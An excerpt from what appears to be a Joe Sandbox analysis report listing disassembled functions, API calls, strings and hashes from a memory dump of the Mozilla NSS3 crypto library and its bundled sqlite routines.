                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB10B48
                                                              • Part of subcall function 6CB109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB10C76
                                                              • Part of subcall function 6CB109D0: PR_LogFlush.NSS3 ref: 6CB10C7E
                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CB10EFA
                                                              • Part of subcall function 6C9FAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C9FAF0E
                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB10F16
                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB10F1C
                                                            • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB10F25
                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB10F2B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                            • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                            • API String ID: 3905088656-1374795319
                                                            • Opcode ID: 8daa37abafe1704871519b71c92edfa5a1de0c30ace29bd156f8e1583358b123
                                                            • Instruction ID: 7ceb4a58c22ac95fd0ff2d84d47b9f3bed13164c069860ac411e2e3072b1837d
                                                            • Opcode Fuzzy Hash: 8daa37abafe1704871519b71c92edfa5a1de0c30ace29bd156f8e1583358b123
                                                            • Instruction Fuzzy Hash: 06F044B59001647BDA017FA49C49C9B3E2EDF4A6A4F444424FD0997602DA35E92497B2
                                                            APIs
                                                            • PORT_NewArena_Util.NSS3(00000400), ref: 6CA74DCB
                                                              • Part of subcall function 6CA60FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA087ED,00000800,6C9FEF74,00000000), ref: 6CA61000
                                                              • Part of subcall function 6CA60FF0: PR_NewLock.NSS3(?,00000800,6C9FEF74,00000000), ref: 6CA61016
                                                              • Part of subcall function 6CA60FF0: PL_InitArenaPool.NSS3(00000000,security,6CA087ED,00000008,?,00000800,6C9FEF74,00000000), ref: 6CA6102B
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CA74DE1
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CA74DFF
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA74E59
                                                              • Part of subcall function 6CA5FAB0: free.MOZGLUE(?,-00000001,?,?,6C9FF673,00000000,00000000), ref: 6CA5FAC7
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB3300C,00000000), ref: 6CA74EB8
                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6CA74EFF
                                                            • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CA74F56
                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA7521A
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                            • String ID:
                                                            • API String ID: 1025791883-0
                                                            • Opcode ID: a8296c57188b87184f6f2544c558b653d7163256695497f355493f7e79e6f911
                                                            • Instruction ID: c0c89fbaaac952aca200736d77415531f0d72732ef30d6e684c87610c8800ae4
                                                            • Opcode Fuzzy Hash: a8296c57188b87184f6f2544c558b653d7163256695497f355493f7e79e6f911
                                                            • Instruction Fuzzy Hash: 58F16B75E00209CFDB14CF59D8406AEB7B2BF44358F294169E915AB781E735E9C2CFA0
                                                            APIs
                                                            • SECOID_GetAlgorithmTag_Util.NSS3(6CA72C2A), ref: 6CA70C81
                                                              • Part of subcall function 6CA5BE30: SECOID_FindOID_Util.NSS3(6CA1311B,00000000,?,6CA1311B,?), ref: 6CA5BE44
                                                              • Part of subcall function 6CA48500: SECOID_GetAlgorithmTag_Util.NSS3(6CA495DC,00000000,00000000,00000000,?,6CA495DC,00000000,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA48517
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA70CC4
                                                              • Part of subcall function 6CA5FAB0: free.MOZGLUE(?,-00000001,?,?,6C9FF673,00000000,00000000), ref: 6CA5FAC7
                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CA70CD5
                                                            • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CA70D1D
                                                            • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CA70D3B
                                                            • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CA70D7D
                                                            • free.MOZGLUE(00000000), ref: 6CA70DB5
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA70DC1
                                                            • free.MOZGLUE(00000000), ref: 6CA70DF7
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA70E05
                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CA70E0F
                                                              • Part of subcall function 6CA495C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA495E0
                                                              • Part of subcall function 6CA495C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA495F5
                                                              • Part of subcall function 6CA495C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CA49609
                                                              • Part of subcall function 6CA495C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CA4961D
                                                              • Part of subcall function 6CA495C0: PK11_GetInternalSlot.NSS3 ref: 6CA4970B
                                                              • Part of subcall function 6CA495C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CA49756
                                                              • Part of subcall function 6CA495C0: PK11_GetIVLength.NSS3(?), ref: 6CA49767
                                                              • Part of subcall function 6CA495C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CA4977E
                                                              • Part of subcall function 6CA495C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA4978E
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                            • String ID:
                                                            • API String ID: 3136566230-0
                                                            APIs
                                                            • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CA1FCBD
                                                            • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CA1FCCC
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CA1FCEF
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA1FD32
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CA1FD46
                                                            • PORT_Alloc_Util.NSS3(00000001), ref: 6CA1FD51
                                                            • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CA1FD6D
                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA1FD84
                                                            Similarity
                                                            • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                            • String ID: :
                                                            • API String ID: 183580322-336475711
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_DigestInit), ref: 6CA36C66
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA36C94
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA36CA3
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA36CB9
                                                            • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CA36CD5
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                            • API String ID: 1003633598-3690128261
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_SessionCancel), ref: 6CA39DF6
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA39E24
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA39E33
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA39E49
                                                            • PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6CA39E65
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
                                                            • API String ID: 1003633598-1678415578
                                                            APIs
                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,6CA07D8F,6CA07D8F,?,?), ref: 6CA06DC8
                                                              • Part of subcall function 6CA5FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CA5FE08
                                                              • Part of subcall function 6CA5FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CA5FE1D
                                                              • Part of subcall function 6CA5FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CA5FE62
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CA07D8F,?,?), ref: 6CA06DD5
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB28FA0,00000000,?,?,?,?,6CA07D8F,?,?), ref: 6CA06DF7
                                                              • Part of subcall function 6CA5B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB318D0,?), ref: 6CA5B095
                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA06E35
                                                              • Part of subcall function 6CA5FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CA5FE29
                                                              • Part of subcall function 6CA5FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CA5FE3D
                                                              • Part of subcall function 6CA5FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CA5FE6F
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA06E4C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6116E
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB28FE0,00000000), ref: 6CA06E82
                                                              • Part of subcall function 6CA06AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CA0B21D,00000000,00000000,6CA0B219,?,6CA06BFB,00000000,?,00000000,00000000,?,?,?,6CA0B21D), ref: 6CA06B01
                                                              • Part of subcall function 6CA06AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CA06B8A
                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA06F1E
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA06F35
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB28FE0,00000000), ref: 6CA06F6B
                                                            • PR_SetError.NSS3(FFFFE005,00000000,6CA07D8F,?,?), ref: 6CA06FE1
                                                            Similarity
                                                            • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                            • String ID:
                                                            • API String ID: 587344769-0
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE10
                                                            • EnterCriticalSection.KERNEL32(?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE24
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,6CA2D079,00000000,00000001), ref: 6CA4AE5A
                                                            • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE6F
                                                            • free.MOZGLUE(85145F8B,?,?,?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE7F
                                                            • TlsGetValue.KERNEL32(?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AEB1
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AEC9
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AEF1
                                                            • free.MOZGLUE(6CA2CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA2CDBB,?), ref: 6CA4AF0B
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AF30
                                                            Similarity
                                                            • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                            • String ID:
                                                            • API String ID: 161582014-0
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA2AB7F,?,00000000,?), ref: 6CA24CB4
                                                            • EnterCriticalSection.KERNEL32(0000001C,?,6CA2AB7F,?,00000000,?), ref: 6CA24CC8
                                                            • TlsGetValue.KERNEL32(?,6CA2AB7F,?,00000000,?), ref: 6CA24CE0
                                                            • EnterCriticalSection.KERNEL32(?,?,6CA2AB7F,?,00000000,?), ref: 6CA24CF4
                                                            • PL_HashTableLookup.NSS3(?,?,?,6CA2AB7F,?,00000000,?), ref: 6CA24D03
                                                            • PR_Unlock.NSS3(?,00000000,?), ref: 6CA24D10
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            • PR_Now.NSS3(?,00000000,?), ref: 6CA24D26
                                                              • Part of subcall function 6CAC9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DC6
                                                              • Part of subcall function 6CAC9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DD1
                                                              • Part of subcall function 6CAC9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAC9DED
                                                            • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CA24D98
                                                            • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CA24DDA
                                                            • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CA24E02
                                                            Similarity
                                                            • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 4032354334-0
                                                            APIs
                                                            • sqlite3_initialize.NSS3 ref: 6C9EFD18
                                                            • sqlite3_initialize.NSS3 ref: 6C9EFD5F
                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C9EFD89
                                                            • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C9EFD99
                                                            • sqlite3_free.NSS3(00000000), ref: 6C9EFE3C
                                                            • sqlite3_free.NSS3(?), ref: 6C9EFEE3
                                                            • sqlite3_free.NSS3(?), ref: 6C9EFEEE
                                                            Similarity
                                                            • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                            • String ID: simple
                                                            • API String ID: 1130978851-3246079234
                                                            APIs
                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9F5EC9
                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9F5EED
                                                            Strings
                                                            • API call with %s database connection pointer, xrefs: 6C9F5EC3
                                                            • unable to close due to unfinalized statements or unfinished backups, xrefs: 6C9F5E64
                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9F5ED1
                                                            • misuse, xrefs: 6C9F5EDB
                                                            • %s at line %d of [%.10s], xrefs: 6C9F5EE0
                                                            • invalid, xrefs: 6C9F5EBE
                                                            Similarity
                                                            • API ID: sqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                            • API String ID: 632333372-1982981357
                                                            APIs
                                                            • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9DDDF9
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9DDE68
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9DDE97
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C9DDEB6
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9DDF78
                                                            Strings
                                                            Similarity
                                                            • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 1526119172-598938438
                                                            APIs
                                                            • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CA4CD08
                                                            • PK11_DoesMechanism.NSS3(?,?), ref: 6CA4CE16
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA4D079
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            Similarity
                                                            • API ID: DoesErrorK11_MechanismValuememcpy
                                                            • String ID:
                                                            • API String ID: 1351604052-0
                                                            APIs
                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CA497C1,?,00000000,00000000,?,?,?,00000000,?,6CA27F4A,00000000), ref: 6CA3DC68
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DD36
                                                            • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DE2D
                                                            • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DE43
                                                            • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DE76
                                                            • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DF32
                                                            • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DF5F
                                                            • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DF78
                                                            • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DFAA
                                                            Similarity
                                                            • API ID: Alloc_Util$memcpy$Valuemalloc
                                                            • String ID:
                                                            • API String ID: 1886645929-0
                                                            APIs
                                                            • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CA13C76
                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CA13C94
                                                              • Part of subcall function 6CA095B0: TlsGetValue.KERNEL32(00000000,?,6CA200D2,00000000), ref: 6CA095D2
                                                              • Part of subcall function 6CA095B0: EnterCriticalSection.KERNEL32(?,?,?,6CA200D2,00000000), ref: 6CA095E7
                                                              • Part of subcall function 6CA095B0: PR_Unlock.NSS3(?,?,?,?,6CA200D2,00000000), ref: 6CA09605
                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CA13CB2
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CA13CCA
                                                            • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CA13CE1
                                                              • Part of subcall function 6CA13090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA2AE42), ref: 6CA130AA
                                                              • Part of subcall function 6CA13090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CA130C7
                                                              • Part of subcall function 6CA13090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CA130E5
                                                              • Part of subcall function 6CA13090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA13116
                                                              • Part of subcall function 6CA13090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA1312B
                                                              • Part of subcall function 6CA13090: PK11_DestroyObject.NSS3(?,?), ref: 6CA13154
                                                              • Part of subcall function 6CA13090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA1317E
                                                            Similarity
                                                            • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                            • String ID:
                                                            • API String ID: 3167935723-0
                                                            APIs
                                                              • Part of subcall function 6CA53440: PK11_GetAllTokens.NSS3 ref: 6CA53481
                                                              • Part of subcall function 6CA53440: PR_SetError.NSS3(00000000,00000000), ref: 6CA534A3
                                                              • Part of subcall function 6CA53440: TlsGetValue.KERNEL32 ref: 6CA5352E
                                                              • Part of subcall function 6CA53440: EnterCriticalSection.KERNEL32(?), ref: 6CA53542
                                                              • Part of subcall function 6CA53440: PR_Unlock.NSS3(?), ref: 6CA5355B
                                                            • TlsGetValue.KERNEL32 ref: 6CA53D8B
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA53D9F
                                                            • PR_Unlock.NSS3(?), ref: 6CA53DCA
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA53DE2
                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CA53E4F
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • TlsGetValue.KERNEL32 ref: 6CA53E97
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA53EAB
                                                            • PR_Unlock.NSS3(?), ref: 6CA53ED6
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA53EEE
                                                            Similarity
                                                            • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                            • String ID:
                                                            • API String ID: 2554137219-0
                                                            APIs
                                                            • PORT_ZAlloc_Util.NSS3(2E4FCCFD), ref: 6CA02C5D
                                                              • Part of subcall function 6CA60D30: calloc.MOZGLUE ref: 6CA60D50
                                                              • Part of subcall function 6CA60D30: TlsGetValue.KERNEL32 ref: 6CA60D6D
                                                            • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CA02C8D
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA02CE0
                                                              • Part of subcall function 6CA02E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA02CDA,?,00000000), ref: 6CA02E1E
                                                              • Part of subcall function 6CA02E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CA02E33
                                                              • Part of subcall function 6CA02E00: TlsGetValue.KERNEL32 ref: 6CA02E4E
                                                              • Part of subcall function 6CA02E00: EnterCriticalSection.KERNEL32(?), ref: 6CA02E5E
                                                              • Part of subcall function 6CA02E00: PL_HashTableLookup.NSS3(?), ref: 6CA02E71
                                                              • Part of subcall function 6CA02E00: PL_HashTableRemove.NSS3(?), ref: 6CA02E84
                                                              • Part of subcall function 6CA02E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CA02E96
                                                              • Part of subcall function 6CA02E00: PR_Unlock.NSS3 ref: 6CA02EA9
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA02D23
